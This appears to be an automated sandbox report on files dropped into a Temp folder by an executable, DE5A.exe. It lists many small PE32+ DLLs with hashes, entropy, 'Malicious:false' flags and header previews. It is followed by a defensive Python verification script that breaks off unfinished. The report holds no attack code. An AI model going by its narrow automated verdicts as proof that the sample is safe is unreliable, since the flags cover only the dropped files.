                                                                                                                                                                                                                                MD5:C3632083B312C184CBDD96551FED5519
                                                                                                                                                                                                                                SHA1:A93E8E0AF42A144009727D2DECB337F963A9312E
                                                                                                                                                                                                                                SHA-256:BE8D78978D81555554786E08CE474F6AF1DE96FCB7FA2F1CE4052BC80C6B2125
                                                                                                                                                                                                                                SHA-512:8807C2444A044A3C02EF98CF56013285F07C4A1F7014200A21E20FCB995178BA835C30AC3889311E66BC61641D6226B1FF96331B019C83B6FCC7C87870CCE8C4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....O.j.........." .........0...............................................@......9&....`A........................................p................0...............0..x&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.799245167892134
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:R0DfIeUWqhWLWJWadJCsVWQ4mWFVyttuX01k9z3A2YHmp:R0DfIeUWqhWiCsLSR9zfYHmp
                                                                                                                                                                                                                                MD5:517EB9E2CB671AE49F99173D7F7CE43F
                                                                                                                                                                                                                                SHA1:4CCF38FED56166DDBF0B7EFB4F5314C1F7D3B7AB
                                                                                                                                                                                                                                SHA-256:57CC66BF0909C430364D35D92B64EB8B6A15DC201765403725FE323F39E8AC54
                                                                                                                                                                                                                                SHA-512:492BE2445B10F6BFE6C561C1FC6F5D1AF6D1365B7449BC57A8F073B44AE49C88E66841F5C258B041547FCD33CBDCB4EB9DD3E24F0924DB32720E51651E9286BE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....#..........." .........0...............................................@.......,....`A........................................p................0...............0..x&..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.587063911311469
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:fWqhWeWJWadJCsVWQ4mWMs7DENNVAv+cQ0GX01k9z3ARoIGA/:fWqhWbCs8oNbZR9zQoxS
                                                                                                                                                                                                                                MD5:F3FF2D544F5CD9E66BFB8D170B661673
                                                                                                                                                                                                                                SHA1:9E18107CFCD89F1BBB7FDAF65234C1DC8E614ADD
                                                                                                                                                                                                                                SHA-256:E1C5D8984A674925FA4AFBFE58228BE5323FE5123ABCD17EC4160295875A625F
                                                                                                                                                                                                                                SHA-512:184B09C77D079127580EF80EB34BDED0F5E874CEFBE1C5F851D86861E38967B995D859E8491FCC87508930DC06C6BBF02B649B3B489A1B138C51A7D4B4E7AAAD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......e.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.754374422741657
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:CGeVPWqhWUWJWadJCsVWQ4mWUhSqyttuX01k9z3A2lqn7cq:CGeVPWqhWBCsvoSR9zflBq
                                                                                                                                                                                                                                MD5:A0C2DBE0F5E18D1ADD0D1BA22580893B
                                                                                                                                                                                                                                SHA1:29624DF37151905467A223486500ED75617A1DFD
                                                                                                                                                                                                                                SHA-256:3C29730DF2B28985A30D9C82092A1FAA0CEB7FFC1BD857D1EF6324CF5524802F
                                                                                                                                                                                                                                SHA-512:3E627F111196009380D1687E024E6FFB1C0DCF4DCB27F8940F17FEC7EFDD8152FF365B43CB7FDB31DE300955D6C15E40A2C8FB6650A91706D7EA1C5D89319B12
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......Z.........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.664553499673792
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:mZyMvr5WqhWAWJWadJCsVWQ4mWWqpNVAv+cQ0GX01k9z3ARo+GZ:mZyMvlWqhWNCsUpNbZR9zQo+GZ
                                                                                                                                                                                                                                MD5:2666581584BA60D48716420A6080ABDA
                                                                                                                                                                                                                                SHA1:C103F0EA32EBBC50F4C494BCE7595F2B721CB5AD
                                                                                                                                                                                                                                SHA-256:27E9D3E7C8756E4512932D674A738BF4C2969F834D65B2B79C342A22F662F328
                                                                                                                                                                                                                                SHA-512:BEFED15F11A0550D2859094CC15526B791DADEA12C2E7CEB35916983FB7A100D89D638FB1704975464302FAE1E1A37F36E01E4BEF5BC4924AB8F3FD41E60BD0C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):5.146069394118203
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:vUwidv3V0dfpkXc0vVaCsWqhWjCsa2IR9z5Bk5l:sHdv3VqpkXc0vVaP+U9zzk5l
                                                                                                                                                                                                                                MD5:225D9F80F669CE452CA35E47AF94893F
                                                                                                                                                                                                                                SHA1:37BD0FFC8E820247BD4DB1C36C3B9F9F686BBD50
                                                                                                                                                                                                                                SHA-256:61C0EBE60CE6EBABCB927DDFF837A9BF17E14CD4B4C762AB709E630576EC7232
                                                                                                                                                                                                                                SHA-512:2F71A3471A9868F4D026C01E4258AFF7192872590F5E5C66AABD3C088644D28629BA8835F3A4A23825631004B1AFD440EFE7161BB9FC7D7C69E0EE204813CA7B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@.......J....`A........................................p...X............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.834520503429805
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:etZ3xWqhWqWJWadJCsVWQ4mWfH/fKUSIX01k9z3AEXz40OY:etZ3xWqhWHCsMH2IR9z5OY
                                                                                                                                                                                                                                MD5:1281E9D1750431D2FE3B480A8175D45C
                                                                                                                                                                                                                                SHA1:BC982D1C750B88DCB4410739E057A86FF02D07EF
                                                                                                                                                                                                                                SHA-256:433BD8DDC4F79AEE65CA94A54286D75E7D92B019853A883E51C2B938D2469BAA
                                                                                                                                                                                                                                SHA-512:A954E6CE76F1375A8BEAC51D751B575BBC0B0B8BA6AA793402B26404E45718165199C2C00CCBCBA3783C16BDD96F0B2C17ADDCC619C39C8031BECEBEF428CE77
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@.......w....`A........................................p...x............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.916367637528538
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:qaIMFSYWqhWzWJWadJCsVWQ4mW14LyttuX01k9z3A2ClV:qdYWqhWqCsISR9zfCT
                                                                                                                                                                                                                                MD5:FD46C3F6361E79B8616F56B22D935A53
                                                                                                                                                                                                                                SHA1:107F488AD966633579D8EC5EB1919541F07532CE
                                                                                                                                                                                                                                SHA-256:0DC92E8830BC84337DCAE19EF03A84EF5279CF7D4FDC2442C1BC25320369F9DF
                                                                                                                                                                                                                                SHA-512:3360B2E2A25D545CCD969F305C4668C6CDA443BBDBD8A8356FFE9FBC2F70D90CF4540F2F28C9ED3EEA6C9074F94E69746E7705E6254827E6A4F158A75D81065B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...~.l-.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):22136
                                                                                                                                                                                                                                Entropy (8bit):4.829681745003914
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HNpWqhW5WJWadJCsVWQ4mWbZyttuX01k9z3A2qkFU:HXWqhW4Cs1SR9zf9U
                                                                                                                                                                                                                                MD5:D12403EE11359259BA2B0706E5E5111C
                                                                                                                                                                                                                                SHA1:03CC7827A30FD1DEE38665C0CC993B4B533AC138
                                                                                                                                                                                                                                SHA-256:F60E1751A6AC41F08E46480BF8E6521B41E2E427803996B32BDC5E78E9560781
                                                                                                                                                                                                                                SHA-512:9004F4E59835AF57F02E8D9625814DB56F0E4A98467041DA6F1367EF32366AD96E0338D48FFF7CC65839A24148E2D9989883BCDDC329D9F4D27CAE3F843117D0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...>.os.........." .........0...............................................@............`A........................................p...H............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
Size (bytes):22136
Entropy (8bit):4.612408827336625
Encrypted:false
SSDEEP:192:CWqhW+WJWadJCsVWQ4mWprgfKUSIX01k9z3AEXzh:CWqhW7Cs12IR9z5F
MD5:0F129611A4F1E7752F3671C9AA6EA736
SHA1:40C07A94045B17DAE8A02C1D2B49301FAD231152
SHA-256:2E1F090ABA941B9D2D503E4CD735C958DF7BB68F1E9BDC3F47692E1571AAAC2F
SHA-512:6ABC0F4878BB302713755A188F662C6FE162EA6267E5E1C497C9BA9FDDBDAEA4DB050E322CB1C77D6638ECF1DAD940B9EBC92C43ACAA594040EE58D313CBCFAE
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22136
Entropy (8bit):4.918215004381039
Encrypted:false
SSDEEP:192:OvMWqhWkWJWadJCsVWQ4mWoz/HyttuX01k9z3A21O:JWqhWxCs/SSR9zf1O
MD5:D4FBA5A92D68916EC17104E09D1D9D12
SHA1:247DBC625B72FFB0BF546B17FB4DE10CAD38D495
SHA-256:93619259328A264287AEE7C5B88F7F0EE32425D7323CE5DC5A2EF4FE3BED90D5
SHA-512:D5A535F881C09F37E0ADF3B58D41E123F527D081A1EBECD9A927664582AE268341771728DC967C30908E502B49F6F853EEAEBB56580B947A629EDC6BCE2340D8
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):26216
Entropy (8bit):4.882777558752248
Encrypted:false
SSDEEP:192:I9cy5WqhWKWEXCVWQ4mW1pbm6yttuX01k9z3A2jyM:Ry5WqhWdcbmLSR9zfjj
MD5:EDF71C5C232F5F6EF3849450F2100B54
SHA1:ED46DA7D59811B566DD438FA1D09C20F5DC493CE
SHA-256:B987AB40CDD950EBE7A9A9176B80B8FFFC005CCD370BB1CBBCAD078C1A506BDC
SHA-512:481A3C8DC5BEF793EE78CE85EC0F193E3E9F6CD57868B813965B312BD0FADEB5F4419707CD3004FBDB407652101D52E061EF84317E8BD458979443E9F8E4079A
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22120
Entropy (8bit):4.738587310329139
Encrypted:false
SSDEEP:192:TWqhWXWEXCVWQ4mWPXTNyttuX01k9z3A2dGxr:TWqhWMKASR9zfYxr
MD5:F9235935DD3BA2AA66D3AA3412ACCFBF
SHA1:281E548B526411BCB3813EB98462F48FFAF4B3EB
SHA-256:2F6BD6C235E044755D5707BD560A6AFC0BA712437530F76D11079D67C0CF3200
SHA-512:AD0C0A7891FB8328F6F0CF1DDC97523A317D727C15D15498AFA53C07610210D2610DB4BC9BD25958D47ADC1AF829AD4D7CF8AABCAB3625C783177CCDB7714246
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22120
Entropy (8bit):5.202163846121633
Encrypted:false
SSDEEP:192:2pUEpnWlC0i5CBWqhWXLeWEXCVWQ4iW+/x6RMySX01k9z3Aza8Az629:2ptnWm5CBWqhWtWMR9zqaH629
MD5:5107487B726BDCC7B9F7E4C2FF7F907C
SHA1:EBC46221D3C81A409FAB9815C4215AD5DA62449C
SHA-256:94A86E28E829276974E01F8A15787FDE6ED699C8B9DC26F16A51765C86C3EADE
SHA-512:A0009B80AD6A928580F2B476C1BDF4352B0611BB3A180418F2A42CFA7A03B9F0575ED75EC855D30B26E0CCA96A6DA8AFFB54862B6B9AFF33710D2F3129283FAA
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22120
Entropy (8bit):4.866983142029453
Encrypted:false
SSDEEP:192:0vh8Y17aFBRsWqhW9AWEXCVWQ4mWCB4Lrp0KBQfX01k9z3ALkg5Z7:SL5WqhW9boRxB+R9z2kM7
MD5:D5D77669BD8D382EC474BE0608AFD03F
SHA1:1558F5A0F5FACC79D3957FF1E72A608766E11A64
SHA-256:8DD9218998B4C4C9E8D8B0F8B9611D49419B3C80DAA2F437CBF15BCFD4C0B3B8
SHA-512:8DEFA71772105FD9128A669F6FF19B6FE47745A0305BEB9A8CADB672ED087077F7538CD56E39329F7DAA37797A96469EAE7CD5E4CCA57C9A183B35BDC44182F3
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22136
Entropy (8bit):4.828044267819929
Encrypted:false
SSDEEP:192:dUnWqhWRWJWadJCsVWQ4mW+2PyttuX01k9z3A23y:cWqhWQCsHSR9zf3y
MD5:650435E39D38160ABC3973514D6C6640
SHA1:9A5591C29E4D91EAA0F12AD603AF05BB49708A2D
SHA-256:551A34C400522957063A2D71FA5ABA1CD78CC4F61F0ACE1CD42CC72118C500C0
SHA-512:7B4A8F86D583562956593D27B7ECB695CB24AB7192A94361F994FADBA7A488375217755E7ED5071DE1D0960F60F255AA305E9DD477C38B7BB70AC545082C9D5E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...6..q.........." .........0...............................................@.......-....`A............................................e............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):30328
Entropy (8bit):5.14173409150951
Encrypted:false
SSDEEP:384:r7yaFM4Oe59Ckb1hgmLVWqhW2CsWNbZR9zQoekS:/FMq59Bb1jnoFT9zGp
MD5:B8F0210C47847FC6EC9FBE2A1AD4DEBB
SHA1:E99D833AE730BE1FEDC826BF1569C26F30DA0D17
SHA-256:1C4A70A73096B64B536BE8132ED402BCFB182C01B8A451BFF452EFE36DDF76E7
SHA-512:992D790E18AC7AE33958F53D458D15BFF522A3C11A6BD7EE2F784AC16399DE8B9F0A7EE896D9F2C96D1E2C8829B2F35FF11FC5D8D1B14C77E22D859A1387797C
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................" .........P...............................................`............`A.............................................%...........P...............P..x&..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22120
Entropy (8bit):4.883012715268179
Encrypted:false
SSDEEP:192:5eXrqjd7ZWqhW3WEXCVWQ4mW3Ql1Lrp0KBQfX01k9z3ALkjY/12:54rgWqhWsP1RxB+R9z2kjY/Y
MD5:272C0F80FD132E434CDCDD4E184BB1D8
SHA1:5BC8B7260E690B4D4039FE27B48B2CECEC39652F
SHA-256:BD943767F3E0568E19FB52522217C22B6627B66A3B71CD38DD6653B50662F39D
SHA-512:94892A934A92EF1630FBFEA956D1FE3A3BFE687DEC31092828960968CB321C4AB3AF3CAF191D4E28C8CA6B8927FBC1EC5D17D5C8A962C848F4373602EC982CD4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...<SdT.........." .........0...............................................@......N.....`A............................................x............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):26208
Entropy (8bit):5.023753175006074
Encrypted:false
SSDEEP:192:4mGqX8mPrpJhhf4AN5/KiFWqhWyzWEXCVWQ4OW4034hHssDX01k9z3AaYX2cWo:4ysyr77WqhWyI0oFDR9z9YH9
MD5:20C0AFA78836B3F0B692C22F12BDA70A
SHA1:60BB74615A71BD6B489C500E6E69722F357D283E
SHA-256:962D725D089F140482EE9A8FF57F440A513387DD03FDC06B3A28562C8090C0BC
SHA-512:65F0E60136AB358661E5156B8ECD135182C8AAEFD3EC320ABDF9CFC8AEAB7B68581890E0BBC56BAD858B83D47B7A0143FA791195101DC3E2D78956F591641D16
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....TR.........." .........@...............................................P......D!....`A............................................4............@...............@..`&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):26232
Entropy (8bit):5.289041983400337
Encrypted:false
SSDEEP:192:UuV2OlkuWYFxEpahfWqhWNWJWadJCsVWQ4mWeX9UfKUSIX01k9z3AEXzGd5S:dV2oFVhfWqhWMCstE2IR9z5Sd5S
MD5:96498DC4C2C879055A7AFF2A1CC2451E
SHA1:FECBC0F854B1ADF49EF07BEACAD3CEC9358B4FB2
SHA-256:273817A137EE049CBD8E51DC0BB1C7987DF7E3BF4968940EE35376F87EF2EF8D
SHA-512:4E0B2EF0EFE81A8289A447EB48898992692FEEE4739CEB9D87F5598E449E0059B4E6F4EB19794B9DCDCE78C05C8871264797C14E4754FD73280F37EC3EA3C304
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...k. U.........." .........@...............................................P............`A............................................a............@...............@..x&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):26232
Entropy (8bit):5.284932479906984
Encrypted:false
SSDEEP:384:tCLx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWqhWbQCsMSR9zful:tCV5yguNvZ5VQgx3SbwA71IkFGqHe9zI
MD5:115E8275EB570B02E72C0C8A156970B3
SHA1:C305868A014D8D7BBEF9ABBB1C49A70E8511D5A6
SHA-256:415025DCE5A086DBFFC4CF322E8EAD55CB45F6D946801F6F5193DF044DB2F004
SHA-512:B97EF7C5203A0105386E4949445350D8FF1C83BDEAEE71CCF8DC22F7F6D4F113CB0A9BE136717895C36EE8455778549F629BF8D8364109185C0BF28F3CB2B2CA
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.... .h.........." .........@...............................................P......\.....`A.........................................................@...............@..x&..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22120
Entropy (8bit):5.253102285412285
Encrypted:false
SSDEEP:192:mt3hwDGWqhWrWEXCVWQ4mWn+deyttuX01k9z3A23x:AWqhWgPSR9zfh
MD5:001E60F6BBF255A60A5EA542E6339706
SHA1:F9172EC37921432D5031758D0C644FE78CDB25FA
SHA-256:82FBA9BC21F77309A649EDC8E6FC1900F37E3FFCB45CD61E65E23840C505B945
SHA-512:B1A6DC5A34968FBDC8147D8403ADF8B800A06771CC9F15613F5CE874C29259A156BAB875AAE4CAAEC2117817CE79682A268AA6E037546AECA664CD4EEA60ADBF
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...G............" .........0...............................................@.......&....`A.........................................................0...............0..h&..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
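The per-file record the report prints for each dropped file (File Type, Size, Entropy, Encrypted, the MD5/SHA1/SHA-256/SHA-512 set and the Preview) can be recomputed locally to verify a file recovered from an infected host against these entries. The script below is an added example, not part of the Joe Sandbox report or its tooling: the 7.0 bits-per-byte entropy cut-off used for the Encrypted flag is an assumption (the report does not state its own), and the input is a constructed, headers-only PE32+ DLL image built inline rather than one of the dropped files above.

```python
import hashlib
import math
import struct

# Constants from the PE/COFF specification.
IMAGE_FILE_DLL = 0x2000
MACHINE_NAMES = {0x014C: "i386", 0x8664: "x86-64", 0xAA64: "ARM64"}
SUBSYSTEM_NAMES = {2: "GUI", 3: "console"}
# Assumed cut-off for the report's "Encrypted" flag; the report does not state its own.
ENTROPY_ENCRYPTED_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_file_type(data: bytes) -> str:
    """Derive a 'File Type' line in the report's wording from the DOS, COFF and optional headers."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "not a PE file (no MZ header)"
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    coff = e_lfanew + 4  # the 20-byte COFF header follows the 4-byte "PE\0\0" signature
    if coff + 20 > len(data) or data[e_lfanew:coff] != b"PE\0\0":
        return "MZ executable without a valid PE signature"
    machine, _nsect, _stamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0] if opt_size >= 2 and opt + 2 <= len(data) else 0
    fmt = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "PE (unknown optional header)")
    # Subsystem sits at offset 68 of the optional header for both PE32 and PE32+.
    subsystem = 0
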